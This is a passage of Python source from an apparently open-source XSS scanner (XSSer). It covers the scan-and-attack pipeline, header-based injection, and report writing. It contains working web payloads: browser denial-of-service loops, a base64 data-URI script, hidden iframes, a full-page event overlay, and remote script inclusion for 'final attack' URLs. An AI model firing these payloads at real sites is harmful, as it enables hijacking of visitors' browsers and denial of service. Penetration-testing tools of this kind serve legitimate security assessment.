  2763. headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer
  2764. try:
  2765. req = urllib.request.Request(url, None, headers)
  2766. tor_reply = urllib.request.urlopen(req).read().decode('utf-8')
  2767. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
  2768. if not tor_reply or 'Congratulations' not in tor_reply:
  2769. print("It seems that Tor is not properly set.\n")
  2770. print("IP address appears to be: " + your_ip + "\n")
  2771. else:
  2772. print("Congratulations!. Tor is properly being used :-)\n")
  2773. print("IP address appears to be: " + your_ip + "\n")
  2774. except:
  2775. print("[Error] Cannot reach TOR checker system!. Are you connected?\n")
  2776. sys.exit(2) # return
  2777. # step 0: get workers
  2778. nthreads = max(1, abs(options.threads))
  2779. nworkers = len(self.pool.workers)
  2780. if nthreads != nworkers:
  2781. if nthreads < nworkers:
  2782. self.pool.dismissWorkers(nworkers-nthreads)
  2783. else:
  2784. self.pool.createWorkers(nthreads-nworkers)
  2785. for reporter in self._reporters:
  2786. reporter.report_state('scanning')
  2787. # step 1: get urls
  2788. urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-\n")
  2789. for reporter in self._reporters:
  2790. reporter.report_state('arming')
  2791. # step 2: get payloads
  2792. payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-\n")
  2793. for reporter in self._reporters:
  2794. reporter.report_state('cloaking')
  2795. if options.Dwo:
  2796. payloads = self.process_payloads_ipfuzzing(payloads)
  2797. elif options.Doo:
  2798. payloads = self.process_payloads_ipfuzzing_octal(payloads)
  2799. for reporter in self._reporters:
  2800. reporter.report_state('locking targets')
  2801. # step 3: get query string
  2802. query_string = self.try_running(self.get_query_string, "\n[Error] Internal problems getting query -string-\n")
  2803. for reporter in self._reporters:
  2804. reporter.report_state('sanitize')
  2805. urls = self.sanitize_urls(urls)
  2806. for reporter in self._reporters:
  2807. reporter.report_state('attack')
  2808. # step 4: perform attack
  2809. self.try_running(self.attack, "\n[Error] Internal problems running attack...\n", (urls, payloads, query_string))
  2810. for reporter in self._reporters:
  2811. reporter.report_state('reporting')
  2812. if len(self.final_attacks):
  2813. self.report("[Info] Waiting for tokens to arrive...")
  2814. while self._ongoing_requests and not self._landing:
  2815. if not self.pool:
  2816. self.mothership.poll_workers()
  2817. else:
  2818. self.poll_workers()
  2819. time.sleep(0.2)
  2820. for reporter in self._reporters:
  2821. reporter.report_state('final sweep...')
  2822. if self.pool:
  2823. self.pool.dismissWorkers(len(self.pool.workers))
  2824. self.pool.joinAllDismissedWorkers()
  2825. start = time.time()
  2826. while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
  2827. time.sleep(0.2)
  2828. for reporter in self._reporters:
  2829. reporter.report_state('landing... '+str(int(5.0 - (time.time() - start))))
  2830. if self.final_attacks and self.options.reversecheck: # try a --reverse-check
  2831. final_attack_payloads = []
  2832. self.report("="*45)
  2833. self.report("[*] Reverse Check(s) Results:")
  2834. self.report("="*45 + "\n")
  2835. for final_attack in self.final_attacks.values():
  2836. if final_attack not in final_attack_payloads:
  2837. final_attack_payloads.append(final_attack)
  2838. for final in final_attack_payloads:
  2839. if self.hash_found:
  2840. for l in self.hash_found:
  2841. hashing = l[3]
  2842. for k, v in final.items():
  2843. if 'success/'+hashing in v: # find XSS "remote poison" payload!
  2844. if not self.options.postdata: # GET
  2845. self.report("[Info] Generating 'XSS Tunneling' [HTTP GET] exploit:\n")
  2846. else: # POST
  2847. self.report("[Info] Generating 'XSS Tunneling' [HTTP POST] exploit:\n")
  2848. if "#http://localhost:19084/success/"+str(hashing) in v: # re-parsing injected params for POST
  2849. v = v.replace("#http://localhost:19084/success/"+str(hashing), "")
  2850. if "<script>document.location=document.location.hash.substring(1)</script>" in v:
  2851. v = v.replace("<script>document.location=document.location.hash.substring(1)", "<script src='http://localhost:19084/success/"+str(hashing)+"'>")
  2852. self.report(v , "\n")
  2853. self.report("-"*25+"\n")
  2854. self.token_arrived_flag, self.success_arrived_flag, self.token_arrived_hash = self.hub.check_hash(hashing) # validate hashes (client+server)
  2855. if self.token_arrived_flag == True and self.token_arrived_hash:
  2856. self.report("[Info] Validating HASHES:\n")
  2857. if self.success_arrived_flag == False:
  2858. self.report(" INJECTED: [", hashing, "] <-> RECEIVED: [", self.token_arrived_hash, "] -> [OK!]\n")
  2859. else:
  2860. self.report(" INJECTED: [", hashing, "] <-> RECEIVED: [KEYWORD: '/success/' via remote Cross URL Injection] -> [OK!]\n")
  2861. self.report("-"*25+"\n")
  2862. if self.options.postdata: # POST
  2863. self.report("[Info] XSS [HTTP POST] VECTOR [100% VULNERABLE] FOUND!:\n\n|-> "+"".join(self.successful_urls), "(POST:", query_string + ")\n")
  2864. else: # GET
  2865. self.report("[Info] XSS [HTTP GET] VECTOR [100% VULNERABLE] FOUND!:\n\n|-> "+"".join(self.successful_urls), "\n")
  2866. self.token_arrived_hashes.append(self.token_arrived_hash) # add token arrived hashes for counting
  2867. else:
  2868. self.report("[Error] Remote XSS exploit [--reverse-check] has FAILED! -> [PASSING!]\n")
  2869. self.report("-"*25+"\n")
  2870. if self.options.reversecheck or self.options.dom:
  2871. try:
  2872. self.driver.close() # end headless embed web browser driver!
  2873. except:
  2874. try:
  2875. self.driver.quit() # try quit()
  2876. except:
  2877. pass
  2878. for reporter in self._reporters:
  2879. reporter.end_attack() # end reports
  2880. if self.mothership:
  2881. self.mothership.remove_reporter(self) # end mothership
  2882. if self.hub:
  2883. self.land() # end token hub server
  2884. self.print_results()
  2885. def sanitize_urls(self, urls):
  2886. all_urls = set()
  2887. if urls is not None:
  2888. for url in urls:
  2889. if url.startswith("http://") or url.startswith("https://"):
  2890. self.urlspoll.append(url)
  2891. all_urls.add(url)
  2892. else:
  2893. if self.options.crawling:
  2894. self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
  2895. else:
  2896. self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
  2897. url = None
  2898. else:
  2899. self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n")
  2900. return all_urls
  2901. def land(self, join=False):
  2902. self._landing = True
  2903. if self.hub:
  2904. self.hub.shutdown()
  2905. if join:
  2906. self.hub.join()
  2907. self.hub = None
  2908. def _prepare_extra_attacks(self, payload):
  2909. """
  2910. Setup extra attacks.
  2911. """
  2912. options = self.options
  2913. agents = [] # user-agents
  2914. try:
  2915. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2916. except:
  2917. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2918. for line in f:
  2919. agents.append(line)
  2920. extra_agent = random.choice(agents).strip() # set random user-agent
  2921. extra_referer = "127.0.0.1"
  2922. extra_cookie = None
  2923. if self.options.script:
  2924. if 'XSS' in payload['payload']:
  2925. payload['payload'] = payload['payload'].replace("XSS","PAYLOAD")
  2926. if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']:
  2927. if options.xsa:
  2928. hashing = self.generate_hash('xsa')
  2929. agent = payload['payload'].replace('PAYLOAD', hashing)
  2930. self._ongoing_attacks['xsa'] = hashing
  2931. self.xsa_injection = self.xsa_injection + 1
  2932. self.options.agent = agent
  2933. extra_agent = agent
  2934. self.extra_hashed_injections[hashing] = "XSA", payload['payload']
  2935. if options.xsr:
  2936. hashing = self.generate_hash('xsr')
  2937. referer = payload['payload'].replace('PAYLOAD', hashing)
  2938. self._ongoing_attacks['xsr'] = hashing
  2939. self.xsr_injection = self.xsr_injection + 1
  2940. self.options.referer = referer
  2941. extra_referer = referer
  2942. self.extra_hashed_injections[hashing] = "XSR", payload['payload']
  2943. if options.coo:
  2944. hashing = self.generate_hash('cookie')
  2945. cookie = payload['payload'].replace('PAYLOAD', hashing)
  2946. self._ongoing_attacks['coo'] = hashing
  2947. self.coo_injection = self.coo_injection + 1
  2948. self.options.cookie = cookie
  2949. extra_cookie = cookie
  2950. self.extra_hashed_injections[hashing] = "COO", payload['payload']
  2951. return extra_agent, extra_referer, extra_cookie
  2952. def attack(self, urls, payloads, query_string):
  2953. """
  2954. Perform an attack on the given urls with the provided payloads and
  2955. query_string.
  2956. """
  2957. for url in urls:
  2958. if self.pool:
  2959. self.poll_workers()
  2960. else:
  2961. self.mothership.poll_workers()
  2962. if not self._landing:
  2963. self.attack_url(url, payloads, query_string)
  2964. def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
  2965. """
  2966. Generate a real attack url using data from a successful test.
  2967. This method also applies DOM stealth mechanisms.
  2968. """
  2969. user_attack_payload = payload['payload']
  2970. if self.options.finalpayload:
  2971. user_attack_payload = self.options.finalpayload
  2972. elif self.options.finalremote:
  2973. user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
  2974. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
  2975. user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
  2976. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
  2977. user_attack_payload = self.options.finalpayload
  2978. if self.options.dos:
  2979. user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
  2980. if self.options.doss:
  2981. user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
  2982. if self.options.b64:
  2983. user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
  2984. if self.options.onm:
  2985. user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
  2986. if self.options.ifr:
  2987. user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
  2988. do_anchor_payload = self.options.anchor
  2989. anchor_data = None
  2990. attack_hash = None
  2991. if do_anchor_payload: # DOM Shadows!
  2992. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
  2993. dest_url = dest_url.replace('?', '#')
  2994. else:
  2995. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
  2996. if attack_hash:
  2997. self.final_attacks[attack_hash] = {'url':dest_url}
  2998. return dest_url
  2999. def token_arrived(self, attack_hash):
  3000. if not self.mothership: # only mothership calls on token arrival
  3001. self.final_attack_callback(attack_hash)
  3002. def final_attack_callback(self, attack_hash):
  3003. if attack_hash in self.final_attacks:
  3004. dest_url = self.final_attacks[attack_hash]['url']
  3005. for reporter in self._reporters:
  3006. reporter.add_checked(dest_url)
  3007. if self._reporter:
  3008. from twisted.internet import reactor
  3009. reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
  3010. def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
  3011. real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
  3012. return real_attack_url
  3013. def report(self, *args):
  3014. args = list([str(s) for s in args])
  3015. formatted = " ".join(args)
  3016. if not self.options.silent:
  3017. print(formatted)
  3018. for reporter in self._reporters:
  3019. reporter.post(formatted)
  3020. def print_results(self):
  3021. """
  3022. Print results from attack.
  3023. """
  3024. self.report('='*75)
  3025. total_injections = len(self.hash_found) + len(self.hash_notfound)
  3026. if len(self.hash_found) + len(self.hash_notfound) == 0:
  3027. pass
  3028. elif self.options.heuristic:
  3029. pass
  3030. else:
  3031. self.report("[*] Final Results:")
  3032. self.report('='*75 + '\n')
  3033. self.report("- Injections:", total_injections)
  3034. self.report("- Failed:", len(self.hash_notfound))
  3035. self.report("- Successful:", len(self.hash_found))
  3036. try:
  3037. _accur = len(self.hash_found) * 100 / total_injections
  3038. except ZeroDivisionError:
  3039. _accur = 0
  3040. self.report("- Accur: %s %%\n" % _accur)
  3041. if not len(self.hash_found) and self.hash_notfound:
  3042. self.report('='*75 + '\n')
  3043. pass
  3044. else:
  3045. self.report('='*75)
  3046. self.report("[*] List of XSS injections:")
  3047. self.report('='*75 + '\n')
  3048. if len(self.hash_found) > 1:
  3049. if len(self.token_arrived_hashes) > 0:
  3050. if len(self.hash_found) == len(self.token_arrived_hashes):
  3051. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] XSS vectors [100% VULNERABLE]! ;-)\n")
  3052. else:
  3053. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.token_arrived_hashes)) + " ] XSS [100% VULNERABLE] of [ " + str(len(self.hash_found)) + " ] possible XSS vectors! ;-)\n")
  3054. else:
  3055. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] possible XSS vectors! ;-)\n")
  3056. else:
  3057. if len(self.token_arrived_hashes) > 0:
  3058. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] XSS vector [100% VULNERABLE]! ;-)\n")
  3059. else:
  3060. self.report("-> CONGRATULATIONS: You have found: [ " + str(len(self.hash_found)) + " ] possible XSS vector! ;-)\n")
  3061. self.report("---------------------" + "\n")
  3062. if self.options.fileoutput:
  3063. fout = open("XSSreport.raw", "w") # write better than append
  3064. for line in self.hash_found:
  3065. if self.options.heuristic or self.options.hash: # not final attack possible when checking
  3066. pass
  3067. else:
  3068. attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
  3069. if line[2] == "XSR":
  3070. self.xsr_found = self.xsr_found + 1
  3071. if len(self.hash_found) < 11:
  3072. if line[4]: # when query string
  3073. self.report("[+] Target:", line[6] + " | " + line[4])
  3074. else:
  3075. self.report("[+] Target:", line[6])
  3076. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3077. self.report("[!] Method: Referer Injection")
  3078. self.report("[*] Hash:", line[3])
  3079. self.report("[*] Payload:", str(Curl.referer))
  3080. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3081. if self.options.fileoutput:
  3082. fout.write("="*75)
  3083. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3084. fout.write("="*75 + "\n\n")
  3085. for h in self.hash_found:
  3086. if h[2] == "XSR":
  3087. if h[4]:
  3088. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3089. else:
  3090. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3091. fout.write("="*75 + "\n\n")
  3092. elif line[2] == "XSA":
  3093. self.xsa_found = self.xsa_found + 1
  3094. if len(self.hash_found) < 11:
  3095. if line[4]: # when query string
  3096. self.report("[+] Target:", line[6] + " | " + line[4])
  3097. else:
  3098. self.report("[+] Target:", line[6])
  3099. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3100. self.report("[!] Method: User-Agent Injection")
  3101. self.report("[*] Hash:", line[3])
  3102. self.report("[*] Payload:", str(Curl.agent))
  3103. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3104. if self.options.fileoutput:
  3105. fout.write("="*75)
  3106. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3107. fout.write("="*75 + "\n\n")
  3108. for h in self.hash_found:
  3109. if h[2] == "XSA":
  3110. if h[4]:
  3111. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3112. else:
  3113. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3114. fout.write("="*75 + "\n\n")
  3115. elif line[2] == "COO":
  3116. self.coo_found = self.coo_found + 1
  3117. if len(self.hash_found) < 11:
  3118. if line[4]: # when query string
  3119. self.report("[+] Target:", line[6] + " | " + line[4])
  3120. else:
  3121. self.report("[+] Target:", line[6])
  3122. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3123. self.report("[!] Method: Cookie Injection")
  3124. self.report("[*] Hash:", line[3])
  3125. self.report("[*] Payload:", str(Curl.cookie))
  3126. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3127. if self.options.fileoutput:
  3128. fout.write("="*75)
  3129. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3130. fout.write("="*75 + "\n\n")
  3131. for h in self.hash_found:
  3132. if h[2] == "COO":
  3133. if h[4]:
  3134. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3135. else:
  3136. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3137. fout.write("="*75 + "\n\n")
  3138. elif line[1] == "[Data Control Protocol Injection]":
  3139. self.dcp_found = self.dcp_found + 1
  3140. if len(self.hash_found) < 11:
  3141. if line[4]: # when query string
  3142. self.report("[+] Target:", line[6] + " | " + line[4])
  3143. else:
  3144. self.report("[+] Target:", line[6])
  3145. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3146. self.report("[!] Method: DCP")
  3147. self.report("[*] Hash:", line[3])
  3148. self.report("[*] Payload:", line[0])
  3149. self.report("[!] Vulnerable: DCP (Data Control Protocol)")
  3150. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3151. self.report("[*] Final Attack:", attack_url)
  3152. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3153. if self.options.fileoutput:
  3154. fout.write("="*75)
  3155. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3156. fout.write("="*75 + "\n\n")
  3157. for h in self.hash_found:
  3158. if h[4]:
  3159. if h[1] == "[Data Control Protocol Injection]":
  3160. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3161. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3162. else:
  3163. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
  3164. else:
  3165. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3166. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3167. else:
  3168. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
  3169. fout.write("="*75 + "\n\n")
  3170. elif line[1] == "[Document Object Model Injection]":
  3171. self.dom_found = self.dom_found + 1
  3172. if len(self.hash_found) < 11:
  3173. if line[4]: # when query string
  3174. self.report("[+] Target:", line[6] + " | " + line[4])
  3175. else:
  3176. self.report("[+] Target:", line[6])
  3177. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3178. self.report("[!] Method: DOM")
  3179. self.report("[*] Hash:", line[3])
  3180. self.report("[*] Payload:", line[0])
  3181. self.report("[!] Vulnerable: DOM (Document Object Model)")
  3182. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3183. self.report("[*] Final Attack:", attack_url)
  3184. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3185. if self.options.fileoutput:
  3186. fout.write("="*75)
  3187. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3188. fout.write("="*75 + "\n\n")
  3189. for h in self.hash_found:
  3190. if h[1] == "[Document Object Model Injection]":
  3191. if h[4]:
  3192. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3193. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3194. else:
  3195. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
  3196. else:
  3197. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3198. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3199. else:
  3200. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
  3201. fout.write("="*75 + "\n\n")
  3202. elif line[1] == "[Induced Injection]":
  3203. self.httpsr_found = self.httpsr_found +1
  3204. if len(self.hash_found) < 11:
  3205. if line[4]: # when query string
  3206. self.report("[+] Target:", line[6] + " | " + line[4])
  3207. else:
  3208. self.report("[+] Target:", line[6])
  3209. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3210. self.report("[!] Method: INDUCED")
  3211. self.report("[*] Hash:", line[3])
  3212. self.report("[*] Payload:", line[0])
  3213. self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)")
  3214. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3215. self.report("[*] Final Attack:", attack_url)
  3216. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3217. if self.options.fileoutput:
  3218. fout.write("="*75)
  3219. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3220. fout.write("="*75 + "\n\n")
  3221. for h in self.hash_found:
  3222. if h[4]:
  3223. if h[1] == "[Induced Injection]":
  3224. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3225. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3226. else:
  3227. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
  3228. else:
  3229. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3230. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3231. else:
  3232. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
  3233. fout.write("="*75 + "\n\n")
  3234. elif line[1] == "[hashing check]":
  3235. if len(self.hash_found) < 11:
  3236. if line[4]:
  3237. self.report("[+] Target:", line[6] + " | " + line[4])
  3238. else:
  3239. self.report("[+] Target:", line[6])
  3240. self.report("[+] Vector: [ " + str(line[3]) + " ]")
  3241. self.report("[!] Method:", line[2])
  3242. self.report("[*] Payload:", line[5])
  3243. self.report("[!] Status: HASH FOUND!", "\n", '-'*50, "\n")
  3244. if self.options.fileoutput:
  3245. fout.write("="*75)
  3246. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3247. fout.write("="*75 + "\n\n")
  3248. for h in self.hash_found:
  3249. if h[1] == "[hashing check]":
  3250. if h[4]:
  3251. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
  3252. else:
  3253. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
  3254. fout.write("="*75 + "\n\n")
  3255. elif line[1] == "[manual_injection]":
  3256. self.manual_found = self.manual_found + 1
  3257. if len(self.hash_found) < 11:
  3258. if line[4]: # when query string
  3259. self.report("[+] Target:", line[6] + " | " + line[4])
  3260. else:
  3261. self.report("[+] Target:", line[6])
  3262. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3263. self.report("[!] Method: MANUAL")
  3264. self.report("[*] Hash:", line[3])
  3265. self.report("[*] Payload:", line[0])
  3266. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3267. self.report("[*] Final Attack:", attack_url)
  3268. if self.token_arrived_flag == True:
  3269. self.report("[!] Status: XSS FOUND! [100% VULNERABLE]", "\n", '-'*50, "\n")
  3270. else:
  3271. if self.options.reversecheck:
  3272. self.report("[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]", "\n", '-'*50, "\n")
  3273. else:
  3274. self.report("[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]", "\n", '-'*50, "\n")
  3275. if self.options.fileoutput:
  3276. fout.write("="*75)
  3277. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3278. fout.write("="*75 + "\n\n")
  3279. for line in self.hash_found:
  3280. if line[4]:
  3281. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3282. if self.token_arrived_flag == True:
  3283. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3284. else:
  3285. if self.options.reversecheck:
  3286. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3287. else:
